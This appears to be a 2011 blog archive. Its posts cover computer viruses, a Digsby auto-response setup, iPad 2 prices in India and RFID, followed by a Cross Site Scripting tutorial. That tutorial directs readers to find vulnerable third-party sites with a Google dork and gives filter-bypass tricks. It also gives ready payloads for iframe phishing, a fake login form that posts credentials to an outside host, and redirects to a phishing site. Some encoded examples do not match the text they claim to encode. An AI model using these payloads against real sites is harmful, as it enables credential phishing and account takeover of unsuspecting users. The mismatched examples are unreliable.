Saturday, April 30, 2011


Computer Virus



Computer viruses are programs written by "mean" people to achieve some goal. A computer virus is a program which reproduces itself.



What Does a Virus Basically Mean?


A computer virus is a destructive computer program written to alter the way a computer operates. A computer virus is contagious and passes through networked and shared media, such as floppy disks, CD-ROMs and pen drives.

A virus is a program written by individuals who take pleasure in causing damage to computers and the data stored in them. Upon infecting a computer, viruses copy malicious program code into files and multiply rapidly in size. They are capable of renaming files in a computer so that the programs no longer run. They can also overwrite, corrupt, or delete files in a computer, rendering the computer useless.

Some viruses are programmed or written only to damage system files and even format the hard disk.

A virus, if detected, can cause serious damage to data on the computer. If the computer is on a network, the virus will infect other computers. Sometimes, data on the infected computers is lost and cannot be retrieved. For companies dependent on the data, this can even lead to serious financial loss. Some examples of such viruses are Disk Killer, W97M, Cascade, Autorun, Anna Kournikova and Lovegate.


How Is a Virus Spread?


The virus begins to work and spread when you start up the program or application in which the virus is present. The virus may be programmed to attach to other applications, disks or folders. It may infect a network if given the opportunity.


Antivirus Software


It is nothing but software designed to protect your system against viruses. You can protect your hard disk from a virus attack by using antivirus software. Antivirus software is software that scans the computer’s hard disk to detect viruses. If any virus is found, the software removes it from the computer. A number of antivirus programs are available in the market. Some of them are:

• McAfee
• Quick Heal
• Smart dog


Why Does Antivirus Software Need to Be Updated?


New viruses are created every day, which multiply through the internet and infected networks. Therefore, you need to update your antivirus software on a regular basis.


How to Protect Your System from Virus Attacks?


Here are some precautions that you can follow to keep your computer free from viruses:

* Scan all floppy disks before copying or opening files.

* Install at least one antivirus program on your computer and use it regularly to check for viruses.

* Update your antivirus program regularly to protect your computer from new viruses.

* Make backup copies of important files regularly, so that the damage is minimized if a virus attack does occur.


As every new breed of virus is conceived, created and released into the wild, another small change is made to the anti-virus software to combat the new threat.


Author : Pratik Nikam
Thanks :)




Thursday, April 28, 2011


How to Set Auto-Response for Facebook, Gmail, Yahoo etc.


There are lots of messengers available; my favourite one is Digsby. Many of my friends have asked me how they get an auto-response when they send an IM. So here is the solution for it!

Firstly you will need to download the Digsby software. It is IM software which allows you to log in to various accounts like Gtalk, Yahoo, Facebook, AIM, Live, Twitter, MySpace etc.

Here is the download link for Digsby: Download Digsby

Now just follow these steps:

1) Open Digsby

If you are already a Digsby member then jump directly to step 5

2) Now you will have to create one Digsby account which you will use for Digsby.
3) Now go to Digsby >> My Accounts. Here add your account (FB, Gmail, Yahoo) usernames and passwords and click "Save"
4) Now your usernames and passwords are with Digsby, so you will not need to enter them every time. All you will need is your Digsby account username and password

5) Now go to Digsby >> My Status >> " Away "



6) Now change "Away" with whatever you want !



7) Go to Tools >> Preferences >> Status >> Tick "Auto-Response with Status Message"

8) Now auto-response will be activated

9) If anyone sends you an IM then it will look like this (I am showing you for FB; the same is the case with others)



I hope you like it :)

Thanks :)

Tomorrow Apple iPad 2 coming to India

Yes friends, you heard it right! Here is the good news if you are an Apple lover. Apple has officially announced through a press release that it will launch the much-awaited iPad 2 in India on April 29. Along with India, Apple is also releasing the iPad 2 in Hong Kong, Israel, Korea, Macau, Malaysia, Philippines, Singapore, South Africa, Turkey and UAE. China will get only the Wi-Fi version on April 28.






The iPad 2 prices in India are as follows:

Wi-Fi 16 GB        Rs. 29,500
Wi-Fi 32 GB        Rs. 34,500
Wi-Fi 64 GB        Rs. 39,500
Wi-Fi+3G 16 GB     Rs. 36,900
Wi-Fi+3G 32 GB     Rs. 41,900
Wi-Fi+3G 64 GB     Rs. 46,900

Anyways, are you buying an iPad?


Do you think iPad launch will hurt Samsung Galaxy Tab’s sale in India? What about Notion Ink’s Adam?
Thanks :)



Wednesday, April 27, 2011


RFID ( Radio Frequency Identification )


RADIO FREQUENCY IDENTIFICATION



INTRODUCTION

RFID (Radio Frequency IDentification) is a technology that incorporates the use of electromagnetic or electrostatic coupling in the radio frequency (RF) portion of the electromagnetic spectrum to uniquely identify an object, animal, or a person. It is an automatic identification method, relying on storing and remotely retrieving data whenever required using devices called RFID Tags or transponders.

Definition :-

RFID is a convenient and popular term for a technology with vague boundaries and many facets. Radio-frequency identification is not always based on radio-frequency communications and identification is only one among the many functions RFID technology can perform. Rather, RFID enables data collection with contactless electronic tags and wireless transmitters (readers) for identification and other purposes.

Concept :-

RFID uses a semiconductor (micro-chip) in a tag or label to transmit stored data when the tag or label is exposed to radio waves of the correct frequency.


HISTORY


Radio frequency identification has been around for decades. Learn how it evolved from its roots in World War II radar systems to today's hottest supply chain technology. It’s generally said that the roots of radio frequency identification technology can be traced back to World War II. The Germans, Japanese, Americans and British were all using radar—which had been discovered in 1935 by Scottish physicist Sir Robert Alexander Watson-Watt—to warn of approaching planes while they were still miles away. The problem was there was no way to identify which planes belonged to the enemy and which were a country’s own pilots returning from a mission.

The Germans discovered that if pilots rolled their planes as they returned to base, it would change the radio signal reflected back. This crude method alerted the radar crew on the ground that these were German planes and not Allied aircraft (this is, essentially, the first passive RFID system).


COMPONENTS OF RFID SYSTEM




THE TAG


There are two main components present in the RFID tag. Firstly, a small silicon chip or integrated circuit which contains a unique identification number (ID). Secondly, an antenna that can send and receive radio waves. These two components can be tiny: the antenna consists of a flat, metallic conductive coil rather than a protruding FM-style aerial (see figure 1), and the chip is potentially less than half a millimetre (Hitachi, 2006). These tags can be quite small, thin and, increasingly, easily embedded within packaging, plastic cards, tickets, clothing labels, pallets and books. There are two main types of tags: passive and active. An RFID tag is a transponder which receives a radio signal and, in response to it, sends out a radio signal. The tag contains an antenna and a small chip that stores a small amount of data. Tag memory can be factory or field programmed, partitionable, and optionally permanently locked.


TYPES OF TAG

Active Tags :-

Active RFID Tags are powered by an internal battery and are typically read/write, i.e., Tag data can be rewritten and/or modified. An Active Tag's memory size varies according to application requirements; some systems operate with up to 1MB of memory. In a typical read/write RFID work-in-process system, a Tag might give a machine a set of instructions, and the machine would then report its performance to the Tag. The battery-supplied power of an Active Tag generally gives it a longer read range. The trade-off is greater size, greater cost, and a limited operational life.

Passive Tags :-

Passive RFID Tags operate without a separate external power source and obtain operating power generated from the reader. Passive Tags are consequently much lighter than Active Tags, less expensive, and offer a virtually unlimited operational lifetime. The trade-off is that they have shorter read ranges than Active Tags and require a higher-powered reader. Read-only Tags are typically passive and are programmed with a unique set of data (usually 32 to 128 bits) that cannot be modified. Read-only Tags most often operate as a license plate into a database, in the same way as linear barcodes reference a database containing modifiable product-specific information.



THE READER


The reader is a handheld or fixed unit that can interrogate nearby RFID tags and obtain their ID numbers using radio frequency (RF) communication (i.e. the process does not require contact). When a passive tag is within range of a reader, the tag’s antenna absorbs the energy being emitted from the reader, directs the energy to ‘fire up’ the integrated circuit on the tag, which then uses the energy to beam back the ID number and any other associated information. There are two main classes of RFID readers: read-only, an example being those that operate with the purely passive EPC Class 1 tags, and read/write, which can write new information back to a tag that has been equipped with a read/write memory. 

The readers are becoming increasingly sophisticated, acting as gateways into the network-centric communication systems of modern enterprises by supporting communication protocols such as TCP/IP and network technologies such as DHCP, UDP/IP and Ethernet or 802.11x (for wirelessly sending data back to the enterprise). Many models of reader are handheld devices and resemble the pricing guns or barcode scanners used in supermarkets, but readers can also be fixed in place (e.g. in doorways or at vehicle toll gateways) and even hidden, e.g. embedded into ceilings or walls. 

There are also readers that can be incorporated into handheld devices such as PDAs and mobile phones (e.g. Nokia 5140, Nokia 3220 – see figure 2) and, in addition, class 5 tags are also known as 'reader' tags: devices that can read other RFID tags and exchange data with them.


FREQUENCIES USED



ADVANTAGES AND DISADVANTAGES


ADVANTAGES :- 

RFID tags are very simple to install/inject inside the body of animals, thus helping to keep a track on them. This is useful in animal husbandry and on poultry farms. The installed RFID tags give information about the age, vaccinations and health of the animals.
RFID technology is better than bar codes as it cannot be easily replicated and therefore, it increases the security of the product.
Supply chain management forms the major part of retail business and RFID systems play a key role by managing updates of stocks, transportation and logistics of the product.
Bar-code scanners have repeatedly failed in providing security to gems and jewelry in shops. But nowadays, RFID tags are placed inside jewelry items and an alarm is installed at the exit doors.
The RFID tags can store data up to 2 KB, whereas the bar code has the ability to read just 10-12 digits.


DISADVANTAGES :-

The RFID technology, though very beneficial, is expensive to install. Small and medium scale enterprises find it costly to use it in their firms and offices.

It is difficult for an RFID reader to read the information in case of RFID tags installed in liquids and metal products. The problem is that the liquid and metal surfaces tend to reflect the radio waves, which makes the tags unreadable. The tags have to be placed in various alignments and angles for taking proper reading. This is a tedious task when the work involves big firms.
Interference has been observed if devices such as forklifts and walkie-talkies are in the vicinity of the distribution centers. The presence of mobile phone towers has been found to interfere with RFID radio waves. Wal-Mart, the retail sector giant, has installed billions of RFID tags in their products throughout the world and they have encountered such problems.
RFID technology has been referred to as invasive technology. Consumers are apprehensive about their privacy when they purchase products with RFID tags. Once the radio chips are installed in the product, the customer can be tracked and his personal information can be collected by the RFID reader. However, many stores have a facility that deactivates the RFID tags after the product has been purchased.


APPLICATIONS


Asset Tracking: Tracking or locating static or in-motion assets, such as wheelchairs or IV pumps in a healthcare facility, laptops in a corporation and servers in a data center, was not an easy task. With the help of active RFID technology, the user can instantly determine the general location of tagged assets anywhere within the facility.

People Tracking: People tracking systems are used just like asset tracking systems. Hospitals and jails are the places where tracking is most generally required. Hospitals use RFID tags for tracking their special patients. In an emergency, patients and other essential equipment can easily be tracked. It is mainly very useful in mental care hospitals, where doctors can track each and every activity of the patient.

Document Tracking: This is the most common problem. The availability of a large amount of data and documents brings lots of problems in a document management system.

Government Library: Many government libraries use barcodes and electromagnetic strips to track various assets. RFID technology is used for reading these barcodes; unlike the self-barcode reader, an RFID-powered barcode reader can read multiple items simultaneously.


FUTURE SCOPE


Many people in the industry are of the opinion that RFID is the frontrunner technology for automatic data collection and identification. One of the main benefits, which is still unproven, would be in the supply chain of consumer goods, wherein an RFID tag attached to a product would enable it to be tracked right from the point of manufacture to the retail store and then to a customer’s home. 
In fact, the RFID software market is poised for taking off in a big way.

Many people in the field think that RFID technology is still in its infancy with its potential still untapped. While there is speculation about the amazingly varied ways this technology can be used, unless there are more standards put in place within the industry and until there is a reduction in the cost of RFID technology, it is unlikely that this technology will reach its full potential in the near future. 


CONCLUSION


RFID technology can be the next tool for success and management of various businesses. With more research, the flaws and limitations of this technology can be removed. This will make RFID technology very useful for diverse sectors like retail, transport and jewelry businesses.



Author : Miss.Sampada
Thanks :)




Tuesday, April 26, 2011


Cross Site Scripting




Introduction


XSS is also termed CSS; no, it is not Cascading Style Sheets. It is an abbreviation for Cross Site Scripting. From the title itself it is clear that XSS is related to scripts, to be precise JavaScript. XSS is a very common type of attack found in the web world which allows an attacker to inject his malicious script into a website. When a normal user like us runs that script in his browser, the script or code gets executed.
  

Types of XSS


Basically there are three types of Cross Site Scripting.

1) Local XSS
2) Persistent XSS
3) Non-Persistent XSS

Now we will go through each type 


Local Cross Site Scripting:-
This is one of the basic types of XSS attack. Local XSS attacks are the rarest type of attack found! This requires exploits for a browser vulnerability. Using this attack the hacker can install spam bots, different worms and also backdoors on your computer.

Non-Persistent Cross Site Scripting:-
This is a very common type of attack which generally doesn't harm the website. That means it doesn't steal cookies or anything. This attack is possible using a crafted link created by the hacker and gets activated when the user visits such a link.

Persistent Cross Site Scripting :-
This is the attack which can be used to steal the website's cookies. The browser uses cookies to store the user's personal information so that you stay logged in even after you leave. Cookies are also used for storing the user's authentication information.

One can spread worms using persistent XSS and can also use it to deface websites. These attacks are usually used in online forums, blogs and search engines.


  
How to find XSS Vulnerable Website


Finding an XSS vulnerable website is not a big deal! What you need is just a brain!
So for finding an XSS vulnerable website we will take the help of Google dorks. Using these, the work gets simpler. We will first see what a Google dork is!
A Google dork is nothing but an advanced search on Google; it is used by many bloggers and webmasters!
We will use the following dork for finding XSS vulnerable websites:
inurl:"search.php?q="
First we will see how the above dork works:
“inurl” is used to find the “search.php” file in a website URL. So after searching this you will get all the websites which contain a search.php page, which is what we want!
What you need to do is just copy and paste the above dork into the Google search engine.



How to Execute XSS Commands


Using the Google dork, you will find websites containing a search field. In that search field, try to execute the following simple JavaScript.

<script>alert("xyz");</script>

<script> : The script tag is used to define a client-side script. It may contain scripting elements.
alert : It is a function that pops up a dialog box, which is nothing but a simple window containing the message given in double quotes.
</script> : It is used to mark the end of the script.
Just copy and paste the above script into the search field and press Enter; you will see a pop-up box containing “xyz”.
You can use any word instead of “xyz”! You can also replace " " with ' '.

Let us take an example:
<script>alert('xyz');</script>
I am using “xyz” for this tutorial.
After pressing Enter, the pop-up will appear if the target website is vulnerable!

    |~~~~~~~|    |~~~~~~~|
    |  xyz  | or | 1234  |
    |~~~~~~~|    |~~~~~~~|

Instead of the above code we can also inject code like:
<h1><font color="#00AB00">My name is xyz </font></h1>

You can also use this code:
www.mysite.in/google.php?search=<h1><font color="#00FF00">My name is xyz</font></h1>
In the above code, what we are doing extra is setting the font color of the text “My name is xyz”.
Whatever we are seeing is totally client side. The attacker determines the content of the website!
If the above simple techniques are not working, then don’t worry! There is a solution for every problem. It means the website uses filter techniques to avoid the XSS attack. We will see what bypass techniques are available in the next chapter.


Bypass Techniques


Basically there are three techniques available to bypass the filter; we will go through each.
Techniques available:-
1) HEX Encoding
2) Obfuscation
3) Magic_Quotes_gpc=ON

HEX Encoding
This is a very useful bypass trick. Using this method your script is encoded in hex format and then executed.
This is how
<script>alert("Tutorial");</script>
looks when encoded in HEX:
www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E
We have just converted our script to hex format.

Obfuscation
In the web world there is a term called the “bad wordlist”. That means if you search for any word that is present in this list, it will give you an error like “You are not allowed to search this word”.
So what developers do is put words like “alert” and “script” in this list!
But this is very weak protection! It can be bypassed by obfuscating the script, like
<SCripT>alert ('Tutorial');</ScRipt>
From the above example we can see that there are lots of possibilities!

Magic_Quotes_gpc=ON
This is a PHP setting. It causes every " (double quote), ' (single quote) and \ (backslash) to be escaped with a backslash automatically.
Now how to bypass it when it's ON? We will use the JavaScript function called String.fromCharCode() to convert the text into decimal character codes and pass those to the function. Using "rat", it will look like this:
String.fromCharCode(114, 97, 116)
We have converted every character into its decimal form.
Now insert this in your alert script:
www.site.ru/google.php?search=<script>alert(String.fromCharCode(117, 114, 116, 108));</script>


You can use the following link for converting characters to decimal form.
http://www.asciizeichen.de/tabelle.html


  
Simple XSS attack


Now we will see a very simple XSS attack. Open any website having a search field in it!
Enter the below script into the search box and press Enter.
<script>alert("Hello World");</script>
If the site is vulnerable to XSS attack then it will look like this:



This is how the pop-up will look after executing the script.




What can we do with XSS ?


Till now we have seen a very simple XSS attack. Now we will see how harmful such XSS attacks can be for your website!
Here are some attack techniques that are possible with XSS :-

1) Iframe Phishing
2) Cookie stealing
3) Inject a Phishing script
4) Redirect Phishing

Iframe Phishing :-
Just inject JavaScript code containing an iframe in which your phishing site is embedded. It should look like the target site!
Ex.
www.anysite.in/google.php?search=<iframe src="http://www.phishingsite.in" height="100%" width="100%"></iframe>

Trick : height="100%" width="100%" means that the whole window is filled with that iframe, and www.phishingsite.in is the path where our phishing script is present.
The target site will spawn your phishing site in an iframe, and the website's victims won't see a difference and will log in.

Cookie Stealing:-
Firstly we will see what cookies are.
A cookie is a piece of text stored on the user’s computer by their web browser. It can be used for storing session information, site preferences and for the authentication process. There are two copies of cookies: one is stored at the browser and another is present at the server. Cookies may be set with or without an expiration date.
Cookie stealing is one of the major flaws in XSS. Here what the attacker will do is send you a JavaScript and tell you to execute that script in your browser. After executing that script he will get all your cookies!
Now we will see how he did it!
Basically he has two PHP scripts: the first one is fetch.php and the second is access.php.
fetch.php – This script is used to steal the user's cookies!
access.php – This script is used to access the stolen cookies!
When he gets your cookies, with their help he will be able to log in to your account without a password! Strange, right? So please never visit any anonymous links!

Inject a Phishing script :-
You can inject a username and password field in HTML with the help of <html> and <body> tags!

The attacker will create a fake login page using HTML tags. The victim will think that he needs to log in, so he will enter his username and password there and the attacker will get all the information!
Ex.
www.anysite.in/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head> <div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.in "> Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br /> <input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" /> <br/></form></div></body></html>

Redirect Phishing:-
In this attack just inject a JavaScript redirection script that leads to your phishing site; it needs to look just like the target site.
Ex.
www.site.ru/google.php?search=<script>document.location.href="http://www.phishingsite.in"</script>

How to Fix XSS Holes?

You can secure your website from XSS attacks using the following functions.
1) htmlspecialchars()
The htmlspecialchars() function converts some predefined characters to HTML entities.
The predefined characters are:
  • & (ampersand) becomes &amp;
  • ' (single quote) becomes &#039;
  • " (double quote) becomes &quot;
  • > (greater than) becomes &gt;
  • < (less than) becomes &lt;

2) htmlentities()

This function converts characters to HTML entities.
This function is identical to htmlspecialchars() in all ways, except that with htmlentities(), all characters which have HTML character entity equivalents are translated into these entities.
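
The fix above compared with the filters from the bypass chapter, as an added example that is not part of the original post: it runs the payload shapes shown earlier on this page through the "bad wordlist", through addslashes() standing in for magic_quotes_gpc, and through htmlspecialchars(). The function names, the $samples list and running the wordlist on the still-encoded URL are assumptions made for the illustration.

```php
<?php
// Added example, not code from the original post. Function names and the
// $samples array are constructed; the payload strings are the ones shown above.

// The "bad wordlist" filter from the Obfuscation section (case-sensitive match).
function blacklist_allows(string $input): bool
{
    foreach (['script', 'alert'] as $bad) {
        if (strpos($input, $bad) !== false) {
            return false; // request rejected
        }
    }
    return true;
}

// Hardened output step: encode HTML metacharacters when the value is printed.
// ENT_QUOTES is what turns ' into &#039; (before PHP 8.1 the default flags
// left single quotes untouched).
function encode_for_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable page fragment: the search term is echoed unchanged.
function render_unsafe(string $q): string
{
    return '<p>You searched for: ' . $q . '</p>';
}

// Fixed page fragment: same markup, encoded search term.
function render_safe(string $q): string
{
    return '<p>You searched for: ' . encode_for_html($q) . '</p>';
}

// Query-string values as they appear in the URL (constructed list).
$samples = [
    'plain'        => '<script>alert("xyz");</script>',
    'hex-encoded'  => '%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E',
    'fromCharCode' => '<script>alert(String.fromCharCode(117, 114, 116, 108));</script>',
    'html only'    => '<h1><font color="#00AB00">My name is xyz </font></h1>',
];

printf("%-13s %-9s %-13s %s\n", 'sample', 'wordlist', 'magic_quotes', 'after htmlspecialchars');
foreach ($samples as $label => $raw) {
    // PHP decodes %XX sequences before filling $_GET, so the page sees $q.
    $q = rawurldecode($raw);
    // Assumption: the wordlist is checked against the raw, still-encoded URL.
    $wordlist = blacklist_allows($raw) ? 'passes' : 'blocked';
    // magic_quotes_gpc (removed in PHP 5.4) behaved like addslashes().
    $quotes = addslashes($q) === $q ? 'no effect' : 'adds \\';
    // After encoding, no character that can open a tag or attribute remains.
    $left = strpbrk(encode_for_html($q), '<>"\'') === false ? 'inert text' : 'MARKUP LEFT';
    printf("%-13s %-9s %-13s %s\n", $label, $wordlist, $quotes, $left);
}

// Side by side: the same search term in the vulnerable and the fixed fragment.
$term = rawurldecode($samples['plain']);
echo "\n", render_unsafe($term), "\n", render_safe($term), "\n";
```

Only the last column is the same for every row, because output encoding acts on the characters < > " ' & themselves rather than on particular words or quoting styles.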

Conclusion

Lack of security is not a matter of resources

The conclusion which can be drawn from this is that large corporations and websites are getting hacked in exactly the same way as small-budget business websites, so lack of security is not a matter of resources; rather, there is a lack of awareness among people! So be alert!


Author : Pratik Nikam
Thanks :)